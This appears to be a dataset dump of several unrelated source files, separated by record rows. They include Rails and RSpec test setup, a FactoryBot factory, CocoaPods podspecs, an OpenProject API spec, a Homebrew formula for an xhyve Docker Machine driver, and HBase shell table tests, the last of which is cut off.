# * thor 0.18.1 (http://whatisthor.com/) - A scripting framework that replaces rake, sake and rubigen
# * tilt 1.4.1 (http://github.com/rtomayko/tilt/) - Generic interface to multiple Ruby template engines
# * treetop 1.4.14 (https://github.com/cjheath/treetop) - A Ruby-based text parsing and interpretation DSL
# * uglifier 2.1.2 (http://github.com/lautis/uglifier) - Ruby wrapper for UglifyJS JavaScript compressor
# * xpath 2.0.0 (http://github.com/jnicklas/xpath) - Generate XPath expressions from Ruby
# * blankslate 2.1.2.4 (http://github.com/masover/blankslate) - BlankSlate extracted from Builder.
# * bourbon 3.1.8 (https://github.com/thoughtbot/bourbon) - Bourbon Sass Mixins using SCSS syntax.
# * coffee-script 2.2.0 (http://github.com/josh/ruby-coffee-script) - Ruby CoffeeScript Compiler
# * diff-lcs 1.2.4 (http://diff-lcs.rubyforge.org/) - Diff::LCS computes the difference between two Enumerable sequences using the McIlroy-Hunt longest common subsequence (LCS) algorithm
# * jquery-ui-rails 4.0.3 (https://github.com/joliss/jquery-ui-rails) - jQuery UI packaged for the Rails asset pipeline
# * parslet 1.4.0 (http://kschiess.github.com/parslet) - Parser construction library with great error reporting in Ruby.
# * rack 1.4.5 (http://rack.github.com/) - a modular Ruby webserver interface
# * rack-cache 1.2 (http://tomayko.com/src/rack-cache/) - HTTP Caching for Rack
# * rack-ssl 1.3.3 (https://github.com/josh/rack-ssl) - Force SSL/TLS in your app.
# * rails 3.2.12 (http://www.rubyonrails.org) - Full-stack web application framework.
# * simplecov-html 0.8.0 (https://github.com/colszowka/simplecov-html) - Default HTML formatter for SimpleCov code coverage tool for ruby 1.9+
# * tzinfo 0.3.37 (http://tzinfo.rubyforge.org/) - Daylight-savings aware timezone library
# * warbler 1.4.0.beta1 (http://caldersphere.rubyforge.org/warbler) - Warbler chirpily constructs .war files of your Rails applications.
#
#########################################################################################
# BSD Licensed Libraries
#########################################################################################
#
# * activerecord-jdbc-adapter 1.2.9.1 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 2006-2012 Nick Sieger <[email protected]>, Copyright (c) 2006-2008 Ola Bini <[email protected]>
# * jdbc-postgres 9.2.1004 (https://github.com/jruby/activerecord-jdbc-adapter) - Copyright (c) 1997-2011, PostgreSQL Global Development Group
# * d3js 3.5.16 (https://d3js.org/) Copyright (c) 2015 Mike Bostock
#
#########################################################################################
# Ruby Licensed Libraries
#########################################################################################
#
# * json 1.8.0 (http://json-jruby.rubyforge.org/) - JSON implementation for JRuby
# * rubyzip 0.9.9 (http://github.com/aussiegeek/rubyzip) - rubyzip is a ruby module for reading and writing zip files
# * httpclient 2.3.4.1 (http://github.com/nahi/httpclient) - gives something like the functionality of libwww-perl (LWP) in Ruby
# * test-unit 2.5.5 (http://test-unit.rubyforge.org/) - test-unit - Improved version of Test::Unit bundled in Ruby 1.8.x.
#
#########################################################################################
# Public domain - creative commons Licensed Libraries
#########################################################################################
#
# * torquebox 3.1.2 (http://torquebox.org/) - TorqueBox Gem
# * torquebox-cache 3.1.2 (http://torquebox.org/) - TorqueBox Cache Gem
# * torquebox-configure 3.1.2 (http://torquebox.org/) - TorqueBox Configure Gem
# * torquebox-core 3.1.2 (http://torquebox.org/) - TorqueBox Core Gem
# * torquebox-messaging 3.1.2 (http://torquebox.org/) - TorqueBox Messaging Client
# * torquebox-naming 3.1.2 (http://torquebox.org/) - TorqueBox Naming Client
# * torquebox-rake-support 3.1.2 (http://torquebox.org/) - TorqueBox Rake Support
# * torquebox-security 3.1.2 (http://torquebox.org/) - TorqueBox Security Gem
# * torquebox-server 3.1.2 (http://torquebox.org/) - TorqueBox Server Gem
# * torquebox-stomp 3.1.2 (http://torquebox.org/) - TorqueBox STOMP Support
# * torquebox-transactions 3.1.2 (http://torquebox.org/) - TorqueBox Transactions Gem
# * torquebox-web 3.1.2 (http://torquebox.org/) - TorqueBox Web Gem
#
#########################################################################################
# Apache Licensed Libraries
#########################################################################################
#
# * addressable 2.3.8 (https://github.com/sporkmonger/addressable) - URI Implementation
# * bcrypt-ruby 3.0.1 (http://bcrypt-ruby.rubyforge.org) - OpenBSD's bcrypt() password hashing algorithm.
# * database_cleaner 1.4.0 (http://github.com/bmabey/database_cleaner) - Strategies for cleaning databases. Can be used to ensure a clean state for testing.
# * annotate 2.5.0 (http://github.com/ctran/annotate_models) - Annotates Rails Models, routes, fixtures, and others based on the database schema.
# * nvd3 1.8.4 (http://nvd3.org/) Copyright (c) 2014 Novus Partners - chart library based on d3js
# * smack 3.3.1 (https://www.igniterealtime.org/projects/smack/) - XMPP library
#
#########################################################################################
# LGPL
#########################################################################################
#
# * jruby-1.7.4
# * jruby-jars 1.7.4 (http://github.com/jruby/jruby/tree/master/gem/jruby-jars) - The core JRuby code and the JRuby stdlib as jar
# ** JRuby is tri-licensed GPL, LGPL, and EPL.
#
#########################################################################################
# MPL Licensed Libraries
#########################################################################################
#
# * therubyrhino_jar 1.7.4 (http://github.com/cowboyd/therubyrhino) - Rhino's jars packed for therubyrhino
#
#########################################################################################
# Artistic 2.0
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
#
#########################################################################################
# GPL-2
#########################################################################################
# * mime-types 1.23 (http://mime-types.rubyforge.org/) - This library allows for the identification of a file's likely MIME content type
#
#########################################################################################
# No License Given
#########################################################################################
#
# * spork-testunit 0.0.8 (http://github.com/timcharper/spork-testunit) - spork-testunit
# * sprockets 2.2.2 (http://getsprockets.org/) - Rack-based asset packaging system
#
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
# This file is copied to spec/ when you run 'rails generate rspec:install'
ENV["RAILS_ENV"] ||= 'test'
require File.expand_path("../../config/environment", __FILE__)
require 'rspec/rails'
require 'capybara/rails'
require 'database_cleaner'
# Requires supporting ruby files with custom matchers and macros, etc,
# in spec/support/ and its subdirectories.
Dir[Rails.root.join("spec/support/**/*.rb")].each {|f| require f}
RSpec.configure do |config|
# == Mock Framework
#
# If you prefer to use mocha, flexmock or RR, uncomment the appropriate line:
#
# config.mock_with :mocha
# config.mock_with :flexmock
# config.mock_with :rr
config.mock_with :rspec
# Remove this line if you're not using ActiveRecord or ActiveRecord fixtures
config.fixture_path = "#{::Rails.root}/spec/fixtures"
# If you're not using ActiveRecord, or you'd prefer not to run each of your
# examples within a transaction, remove the following line or assign false
# instead of true.
config.use_transactional_fixtures = true
# Module found in spec/support/session_macros.rb
config.include SessionMacros
# Module found in spec/support/registration_macros.rb
config.include RegistrationMacros
# Enable use of Capybara-specific terms, like 'feature' and 'scenario' (vs. 'describe' and 'it')
config.include Capybara::DSL
end
| 68.726872 | 206 | 0.645536 |
e2e216d24b87afbdd0fd6b1e7e09f7ec97cb6198 | 442 | # frozen_string_literal: true
FactoryBot.define do
factory :incident_management_timeline_event, class: 'IncidentManagement::TimelineEvent' do
association :project
association :author, factory: :user
association :incident
association :promoted_from_note, factory: :note
occurred_at { Time.current }
note { 'timeline created' }
note_html { '<strong>timeline created</strong>' }
action { 'comment' }
end
end
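
# A minimal usage sketch (assuming the factory definitions have been loaded,
# e.g. via FactoryBot.find_definitions or the Rails factory_bot integration):
#
#   event = create(:incident_management_timeline_event, note: 'first update')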
| 29.466667 | 92 | 0.730769 |
182dad7e9a93429812d45b69fbcba7c45c51363f | 1,741 | Pod::Spec.new do |s|
s.name = "DLIDEKeyboard"
s.version = "1.0.0"
s.summary = "Drop-in component for adding additional keyboard keys to both iPad/iPhone keyboards."
s.homepage = "https://github.com/garnett/DLIDEKeyboard"
s.license = {
:type => 'MIT',
:text => <<-LICENSE
Copyright (c) 2011 Gowalla (http://gowalla.com/)
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
LICENSE
}
s.author = { "Denis Lebedev" => "[email protected]" }
s.source = { :git => "https://github.com/garnett/DLIDEKeyboard.git", :tag => '1.0.0' }
s.platform = :ios
s.source_files = 'DLIDEKeyboard', 'DLIDEKeyboard/Classes/*.{h,m}'
s.resources = "DLIDEKeyboard/Assets/*.png"
s.requires_arc = true
end
| 47.054054 | 105 | 0.723148 |
7adb0c5133d2ac3f7c88ecc45be161961861fff3 | 661 | #
# To learn more about a Podspec see http://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'xq_test_two'
s.version = '0.0.1'
s.summary = 'A new flutter plugin project.'
s.description = <<-DESC
A new flutter plugin project.
DESC
s.homepage = 'http://example.com'
s.license = { :file => '../LICENSE' }
s.author = { 'Your Company' => '[email protected]' }
s.source = { :path => '.' }
s.source_files = 'Classes/**/*'
s.public_header_files = 'Classes/**/*.h'
s.dependency 'Flutter'
s.ios.deployment_target = '8.0'
end
| 30.045455 | 83 | 0.544629 |
6a90d1499149f47e874ab342f0b8775e472c3912 | 5,423 | #-- copyright
# OpenProject is an open source project management software.
# Copyright (C) 2012-2021 the OpenProject GmbH
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See docs/COPYRIGHT.rdoc for more details.
#++
require 'spec_helper'
describe "PATCH /api/v3/queries/:id", type: :request do
let(:user) { FactoryBot.create :admin }
let(:status) { FactoryBot.create :status }
let(:project) { FactoryBot.create :project }
def json
JSON.parse last_response.body
end
let!(:query) do
FactoryBot.create(
:global_query,
name: "A Query",
user: user,
is_public: false,
show_hierarchies: false,
display_sums: false
)
end
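  # The request body uses the API's HAL-style conventions: filters, operators,
  # columns, sort criteria and the project are referenced through href links
  # rather than plain ids.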
let(:params) do
{
name: "Dummy Query",
public: true,
showHierarchies: false,
filters: [
{
name: "Status",
_links: {
filter: {
href: "/api/v3/queries/filters/status"
},
operator: {
"href": "/api/v3/queries/operators/="
},
schema: {
"href": "/api/v3/queries/filter_instance_schemas/status"
},
values: [
{
href: "/api/v3/statuses/#{status.id}"
}
]
}
}
],
_links: {
project: {
href: "/api/v3/projects/#{project.id}"
},
columns: [
{
href: "/api/v3/queries/columns/id"
},
{
href: "/api/v3/queries/columns/subject"
},
{
href: "/api/v3/queries/columns/status"
},
{
href: "/api/v3/queries/columns/assignee"
}
],
sortBy: [
{
href: "/api/v3/queries/sort_bys/id-desc"
},
{
href: "/api/v3/queries/sort_bys/assignee-asc"
}
],
groupBy: {
href: "/api/v3/queries/group_bys/assignee"
}
}
}
end
before do
RequestStore.clear!
login_as user
end
describe "updating a query" do
before do
header "Content-Type", "application/json"
patch "/api/v3/queries/#{query.id}", params.to_json
end
it 'should return 200 (ok)' do
expect(last_response.status).to eq(200)
end
it 'should render the updated query' do
json = JSON.parse(last_response.body)
expect(json["_type"]).to eq "Query"
expect(json["name"]).to eq "Dummy Query"
end
it 'should update the query correctly' do
query = Query.first
expect(query.group_by_column.name).to eq :assigned_to
expect(query.sort_criteria).to eq [["id", "desc"], ["assigned_to", "asc"]]
expect(query.columns.map(&:name)).to eq %i[id subject status assigned_to]
expect(query.project).to eq project
expect(query.is_public).to eq true
expect(query.display_sums).to eq false
expect(query.filters.size).to eq 1
filter = query.filters.first
expect(filter.name).to eq :status_id
expect(filter.operator).to eq "="
expect(filter.values).to eq [status.id.to_s]
end
describe "with empty params" do
let(:params) { {} }
it "should not change anything" do
json = JSON.parse(last_response.body)
expect(json["_type"]).to eq "Query"
expect(json["name"]).to eq "A Query"
end
end
end
context "with invalid parameters" do
def post!
header "Content-Type", "application/json"
patch "/api/v3/queries/#{query.id}", params.to_json
end
it "yields a 422 error given an unknown project" do
params[:_links][:project][:href] = "/api/v3/projects/#{project.id}42"
post!
expect(last_response.status).to eq 422
expect(json["message"]).to eq "Project not found"
end
it "yields a 422 error given an unknown operator" do
params[:filters][0][:_links][:operator][:href] = "/api/v3/queries/operators/wut"
post!
expect(last_response.status).to eq 422
expect(json["message"]).to eq "Status Operator is not set to one of the allowed values."
end
it "yields a 422 error given an unknown filter" do
params[:filters][0][:_links][:filter][:href] = "/api/v3/queries/filters/statuz"
post!
expect(last_response.status).to eq 422
expect(json["message"]).to eq "Statuz does not exist."
end
end
end
| 27.668367 | 94 | 0.601696 |
62026b54ec203f09ec93641217eccc832a246796 | 327 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe '{{{grape-starter}}}/v1/oapi' do
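  # The example group's full description doubles as the request path, so the
  # subject issues a GET against the string passed to RSpec.describe above.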
subject(:swagger) do
get RSpec.current_example.metadata[:example_group][:full_description]
last_response
end
specify { expect(swagger.status).to eql 200 }
specify { expect(swagger.body).not_to be_empty }
end
| 23.357143 | 73 | 0.743119 |
794f1365c2bd4b805d5c8c3624ad70f23b7ae64b | 2,004 | class DockerMachineDriverXhyve < Formula
desc "Docker Machine driver for xhyve"
homepage "https://github.com/machine-drivers/docker-machine-driver-xhyve"
url "https://github.com/machine-drivers/docker-machine-driver-xhyve.git",
:tag => "v0.4.0",
:revision => "829c0968dac18547636f3ad6aa5ef83677f48267"
head "https://github.com/machine-drivers/docker-machine-driver-xhyve.git"
bottle do
cellar :any_skip_relocation
rebuild 1
sha256 "5c0cf9c40831d43e094ec493d9c4598019f7c9a9b3daabce0369777fa17f77aa" => :catalina
sha256 "b7e9879c8c5c734da5bd83ae00496dc26dcf8133e354662e7b6a8846bfbfc989" => :mojave
sha256 "282868271a1e504ca8643bb6507eb2f99f8f8703d64050886e00175182b35668" => :high_sierra
end
depends_on "go" => :build
depends_on "docker-machine"
def install
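    # Stage the sources into a conventional GOPATH layout so the project's
    # Makefile and go tooling can resolve its import path during the build.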
(buildpath/"gopath/src/github.com/zchee/docker-machine-driver-xhyve").install \
Dir["{*,.git,.gitignore,.gitmodules}"]
ENV["GOPATH"] = "#{buildpath}/gopath"
build_root = buildpath/"gopath/src/github.com/zchee/docker-machine-driver-xhyve"
build_tags = "lib9p"
cd build_root do
git_hash = `git rev-parse --short HEAD --quiet`.chomp
git_hash = "HEAD-#{git_hash}" if build.head?
go_ldflags = "-w -s -X 'github.com/zchee/docker-machine-driver-xhyve/xhyve.GitCommit=Homebrew#{git_hash}'"
ENV["GO_LDFLAGS"] = go_ldflags
ENV["GO_BUILD_TAGS"] = build_tags
system "make", "build", "CC=#{ENV.cc}"
bin.install "bin/docker-machine-driver-xhyve"
prefix.install_metafiles
end
end
def caveats
<<~EOS
This driver requires superuser privileges to access the hypervisor. To
enable, execute
sudo chown root:wheel #{opt_prefix}/bin/docker-machine-driver-xhyve
sudo chmod u+s #{opt_prefix}/bin/docker-machine-driver-xhyve
EOS
end
test do
assert_match "xhyve-memory-size",
shell_output("#{Formula["docker-machine"].bin}/docker-machine create --driver xhyve -h")
end
end
| 35.157895 | 112 | 0.709581 |
08857615e3592419762fea929ee6325b2e257cf8 | 23,958 | #
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require 'hbase_constants'
include HBaseConstants
module Hbase
# Constructor tests
class TableConstructorTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
end
def teardown
shutdown
end
define_test "Hbase::Table constructor should not fail for existent tables" do
assert_nothing_raised do
table('hbase:meta').close()
end
end
end
# Helper methods tests
class TableHelpersTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
# Create test table if it does not exist
@test_name = "hbase_shell_tests_table"
create_test_table(@test_name)
@test_table = table(@test_name)
end
    def teardown
@test_table.close()
shutdown
end
define_test "is_meta_table? method should return true for the meta table" do
assert(table('hbase:meta').is_meta_table?)
end
define_test "is_meta_table? method should return false for a normal table" do
assert(!@test_table.is_meta_table?)
end
#-------------------------------------------------------------------------------
define_test "get_all_columns should return columns list" do
cols = table('hbase:meta').get_all_columns
assert_kind_of(Array, cols)
assert(cols.length > 0)
end
#-------------------------------------------------------------------------------
define_test "parse_column_name should not return a qualifier for name-only column specifiers" do
col, qual = table('hbase:meta').parse_column_name('foo')
assert_not_nil(col)
assert_nil(qual)
end
define_test "parse_column_name should support and empty column qualifier" do
col, qual = table('hbase:meta').parse_column_name('foo:')
assert_not_nil(col)
assert_not_nil(qual)
end
define_test "parse_column_name should return a qualifier for family:qualifier column specifiers" do
col, qual = table('hbase:meta').parse_column_name('foo:bar')
assert_not_nil(col)
assert_not_nil(qual)
end
end
# Simple data management methods tests
class TableSimpleMethodsTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
# Create test table if it does not exist
@test_name = "hbase_shell_tests_table"
create_test_table(@test_name)
@test_table = table(@test_name)
# Insert data to perform delete operations
@test_table.put("102", "x:a", "2", 1212)
@test_table.put(103, "x:a", "3", 1214)
@test_table.put("104", "x:a", 5)
@test_table.put("104", "x:b", 6)
@test_table.put(105, "x:a", "3")
@test_table.put(105, "x:a", "4")
@test_table.put("111", "x:a", "5")
@test_table.put("111", "x:b", "6")
@test_table.put("112", "x:a", "5")
end
def teardown
@test_table.close
shutdown
end
define_test "put should work without timestamp" do
@test_table.put("123", "x:a", "1")
end
define_test "put should work with timestamp" do
@test_table.put("123", "x:a", "2", Time.now.to_i)
end
define_test "put should work with integer keys" do
@test_table.put(123, "x:a", "3")
end
define_test "put should work with integer values" do
@test_table.put("123", "x:a", 4)
end
define_test "put should work with attributes" do
@test_table.put("123", "x:a", 4, {ATTRIBUTES=>{'mykey'=>'myvalue'}})
end
#-------------------------------------------------------------------------------
define_test "delete should work with string keys" do
@test_table.delete('102', 'x:a', 1212)
res = @test_table._get_internal('102', 'x:a')
assert_nil(res)
end
define_test "delete should work with integer keys" do
res = @test_table._get_internal('103', 'x:a')
assert_not_nil(res)
@test_table.delete(103, 'x:a', 1214)
res = @test_table._get_internal('103', 'x:a')
assert_nil(res)
end
#-------------------------------------------------------------------------------
define_test "deleteall should work w/o columns and timestamps" do
@test_table.deleteall("104")
res = @test_table._get_internal('104', 'x:a', 'x:b')
assert_nil(res)
end
define_test "deleteall should work with integer keys" do
@test_table.deleteall(105)
res = @test_table._get_internal('105', 'x:a')
assert_nil(res)
end
define_test "deletall should work with row prefix" do
@test_table.deleteall({ROWPREFIXFILTER => '11'})
res1 = @test_table._get_internal('111')
assert_nil(res1)
res2 = @test_table._get_internal('112')
assert_nil(res2)
end
define_test "append should work with value" do
@test_table.append("123", 'x:cnt2', '123')
assert_equal("123123", @test_table._append_internal("123", 'x:cnt2', '123'))
end
#-------------------------------------------------------------------------------
define_test "get_counter should work with integer keys" do
@test_table.incr(12345, 'x:cnt')
assert_kind_of(Fixnum, @test_table._get_counter_internal(12345, 'x:cnt'))
end
define_test "get_counter should return nil for non-existent counters" do
assert_nil(@test_table._get_counter_internal(12345, 'x:qqqq'))
end
end
# Complex data management methods tests
# rubocop:disable Metrics/ClassLength
class TableComplexMethodsTest < Test::Unit::TestCase
include TestHelpers
def setup
setup_hbase
# Create test table if it does not exist
@test_name = "hbase_shell_tests_table"
create_test_table(@test_name)
@test_table = table(@test_name)
      # Insert test data
@test_ts = 12345678
@test_table.put(1, "x:a", 1)
@test_table.put(1, "x:b", 2, @test_ts)
@test_table.put(2, "x:a", 11)
@test_table.put(2, "x:b", 12, @test_ts)
@test_table.put(3, "x:a", 21, {ATTRIBUTES=>{'mykey'=>'myvalue'}})
@test_table.put(3, "x:b", 22, @test_ts, {ATTRIBUTES=>{'mykey'=>'myvalue'}})
end
def teardown
@test_table.close
shutdown
end
define_test "count should work w/o a block passed" do
assert(@test_table._count_internal > 0)
end
define_test "count should work with a block passed (and yield)" do
rows = []
cnt = @test_table._count_internal(1) do |cnt, row|
rows << row
end
assert(cnt > 0)
assert(!rows.empty?)
end
define_test "count should support STARTROW parameter" do
count = @test_table.count STARTROW => '4'
assert(count == 0)
end
define_test "count should support STOPROW parameter" do
count = @test_table.count STOPROW => '0'
assert(count == 0)
end
define_test "count should support COLUMNS parameter" do
@test_table.put(4, "x:c", "31")
begin
count = @test_table.count COLUMNS => [ 'x:c']
assert(count == 1)
ensure
@test_table.deleteall(4, 'x:c')
end
end
define_test "count should support FILTER parameter" do
count = @test_table.count FILTER => "ValueFilter(=, 'binary:11')"
assert(count == 1)
end
#-------------------------------------------------------------------------------
define_test "get should work w/o columns specification" do
res = @test_table._get_internal('1')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work for data written with Attributes" do
res = @test_table._get_internal('3')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with integer keys" do
res = @test_table._get_internal(1)
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and a single string COLUMN parameter" do
res = @test_table._get_internal('1', COLUMN => 'x:a')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_nil(res['x:b'])
end
define_test "get should work with hash columns spec and a single string COLUMNS parameter" do
res = @test_table._get_internal('1', COLUMNS => 'x:a')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_nil(res['x:b'])
end
define_test "get should work with hash columns spec and an array of strings COLUMN parameter" do
res = @test_table._get_internal('1', COLUMN => [ 'x:a', 'x:b' ])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and an array of strings COLUMNS parameter" do
res = @test_table._get_internal('1', COLUMNS => [ 'x:a', 'x:b' ])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and an array of strings COLUMNS parameter with AUTHORIZATIONS" do
res = @test_table._get_internal('1', COLUMNS => [ 'x:a', 'x:b' ], AUTHORIZATIONS=>['PRIVATE'])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with hash columns spec and TIMESTAMP only" do
res = @test_table._get_internal('1', TIMESTAMP => @test_ts)
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test 'get should work with hash columns spec and TIMESTAMP and' \
' AUTHORIZATIONS' do
res = @test_table._get_internal('1', TIMESTAMP => 1234, AUTHORIZATIONS=>['PRIVATE'])
assert_nil(res)
end
define_test "get should fail with hash columns spec and strange COLUMN value" do
assert_raise(ArgumentError) do
@test_table._get_internal('1', COLUMN => {})
end
end
define_test "get should fail with hash columns spec and strange COLUMNS value" do
assert_raise(ArgumentError) do
        @test_table._get_internal('1', COLUMNS => {})
end
end
define_test "get should fail with hash columns spec and no TIMESTAMP or COLUMN[S]" do
assert_raise(ArgumentError) do
@test_table._get_internal('1', { :foo => :bar })
end
end
define_test "get should work with a string column spec" do
res = @test_table._get_internal('1', 'x:b')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with an array columns spec" do
res = @test_table._get_internal('1', 'x:a', 'x:b')
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get should work with an array or arrays columns spec (yeah, crazy)" do
res = @test_table._get_internal('1', ['x:a'], ['x:b'])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:a'])
assert_not_nil(res['x:b'])
end
define_test "get with a block should yield (column, value) pairs" do
res = {}
@test_table._get_internal('1') { |col, val| res[col] = val }
assert_equal(res.keys.sort, [ 'x:a', 'x:b' ])
end
define_test "get should support COLUMNS with value CONVERTER information" do
@test_table.put(1, "x:c", [1024].pack('N'))
@test_table.put(1, "x:d", [98].pack('N'))
begin
res = @test_table._get_internal('1', ['x:c:toInt'], ['x:d:c(org.apache.hadoop.hbase.util.Bytes).toInt'])
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(/value=1024/.match(res['x:c']))
assert_not_nil(/value=98/.match(res['x:d']))
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:c')
@test_table.deleteall(1, 'x:d')
end
end
define_test "get should support FILTER" do
@test_table.put(1, "x:v", "thisvalue")
begin
res = @test_table._get_internal('1', FILTER => "ValueFilter(=, 'binary:thisvalue')")
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['x:v'])
assert_nil(res['x:a'])
res = @test_table._get_internal('1', FILTER => "ValueFilter(=, 'binary:thatvalue')")
assert_nil(res)
ensure
# clean up newly added columns for this test only.
@test_table.deleteall(1, 'x:v')
end
end
#-------------------------------------------------------------------------------
define_test "scan should work w/o any params" do
res = @test_table._scan_internal
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support STARTROW parameter" do
res = @test_table._scan_internal STARTROW => '2'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['1'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support STOPROW parameter" do
res = @test_table._scan_internal STOPROW => '2'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_nil(res['2'])
end
define_test "scan should support ROWPREFIXFILTER parameter (test 1)" do
res = @test_table._scan_internal ROWPREFIXFILTER => '1'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_nil(res['2'])
end
define_test "scan should support ROWPREFIXFILTER parameter (test 2)" do
res = @test_table._scan_internal ROWPREFIXFILTER => '2'
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['1'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support LIMIT parameter" do
res = @test_table._scan_internal LIMIT => 1
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_nil(res['2'])
end
define_test "scan should support REVERSED parameter" do
res = @test_table._scan_internal REVERSED => true
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support TIMESTAMP parameter" do
res = @test_table._scan_internal TIMESTAMP => @test_ts
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support TIMERANGE parameter" do
res = @test_table._scan_internal TIMERANGE => [0, 1]
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_nil(res['1'])
assert_nil(res['2'])
end
define_test "scan should support COLUMNS parameter with an array of columns" do
res = @test_table._scan_internal COLUMNS => [ 'x:a', 'x:b' ]
assert_not_nil(res)
assert_kind_of(Hash, res)
assert_not_nil(res['1'])
assert_not_nil(res['1']['x:a'])
assert_not_nil(res['1']['x:b'])
assert_not_nil(res['2'])
assert_not_nil(res['2']['x:a'])
assert_not_nil(res['2']['x:b'])
end
define_test "scan should support COLUMNS parameter with a single column name" do
res = @test_table._scan_internal COLUMNS => 'x:a'
assert_not_nil(res)
assert_kind_of(Hash, res)
